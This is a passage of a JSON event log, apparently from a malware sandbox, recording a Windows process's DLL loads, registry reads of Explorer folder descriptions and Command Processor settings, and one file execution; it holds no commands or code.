{ "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 292, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 293, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 294, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 295, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 296, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 297, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 298, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 299, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 300, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 301, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 302, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 303, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 304, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 305, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 306, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 307, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 308, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 309, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 310, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 311, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 312, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 313, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 314, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 315, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 316, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 317, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 318, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 319, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 320, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 321, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 322, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 323, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 324, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 325, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 326, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 327, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 328, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 329, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 330, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 331, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 332, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 333, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 334, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 335, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 336, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 337, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 338, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 339, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 340, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 341, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 342, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 343, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 344, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 345, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 346, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 347, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 348, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 349, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 350, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 351, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 352, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 353, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 354, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 355, "data": { "file": "psapi.dll", "pathtofile": null, "moduleaddress": "0x76280000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 356, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 357, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 358, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 359, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 360, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 361, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 362, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 363, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 364, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 365, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 366, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 367, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 368, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 369, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 370, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 371, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 372, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 373, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 374, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 375, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 376, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 377, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 378, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 379, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 380, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 381, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 382, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 383, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 384, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 385, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 386, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 387, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 388, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 389, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 390, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 391, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 392, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 393, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 394, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 395, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 396, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 397, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 398, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 399, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 400, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 401, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 402, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 403, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 404, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 405, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 406, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 407, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 408, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 409, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 410, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 411, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 412, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 413, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 414, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 415, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 416, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 417, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 418, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 419, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 420, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 421, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 422, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 423, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 424, "data": { "file": "psapi.dll", "pathtofile": null, "moduleaddress": "0x76280000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 425, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 426, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 427, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 428, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name", "content": "Windows" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 429, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 430, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 431, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 432, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 433, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 434, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 435, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 436, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 437, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 438, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 439, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 440, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 441, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 442, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 443, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 444, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 445, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 446, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,925", "eid": 447, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler", "content": null } }, { "event": "execute", "object": "file", "timestamp": "2025-03-02 21:32:30,019", "eid": 448, "data": { "file": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:31,128", "eid": 449, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", "content": "%USERPROFILE%\\AppData\\Local" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,017", "eid": 450, "data": { "file": "KERNEL32.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 451, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DisableUNCCheck", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 452, "data": { "regkey": 